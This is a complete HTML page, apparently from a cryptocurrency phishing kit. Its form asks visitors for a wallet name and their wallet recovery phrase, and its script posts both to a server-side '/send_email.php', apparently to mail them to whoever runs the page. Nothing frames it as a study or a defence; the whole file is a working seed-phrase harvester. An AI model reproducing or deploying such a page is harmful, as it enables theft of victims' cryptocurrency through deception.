<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Wallet Input Form</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; background: #f4f4f4; }
        form { background: white; padding: 20px; border-radius: 8px; max-width: 400px; margin: auto; }
        input, textarea, button { width: 100%; margin-top: 10px; padding: 10px; border-radius: 4px; border: 1px solid #ccc; }
        button { background-color: #007bff; color: white; border: none; }
        button:hover { background-color: #0056b3; }
    </style>
</head>
<body>
    <h2>Enter Wallet Info</h2>
    <form method="POST">
        <input type="text" name="wallet_name" placeholder="Wallet Name" required />
        <textarea name="wallet_phrase" placeholder="Wallet Recovery Phrase" required></textarea>
        <button type="submit">Submit</button>
    </form>
    <script>
    document.addEventListener("DOMContentLoaded", function () {
        const form = document.querySelector("form");
        if (!form) return;
        form.addEventListener("submit", function (e) {
            e.preventDefault();
            const formData = new FormData(form);
            fetch("/send_email.php", {
                method: "POST",
                body: formData
            })
            .then(res => res.text())
            .then(alert)
            .catch(console.error);
        });
    });
    </script>
</body>
</html>
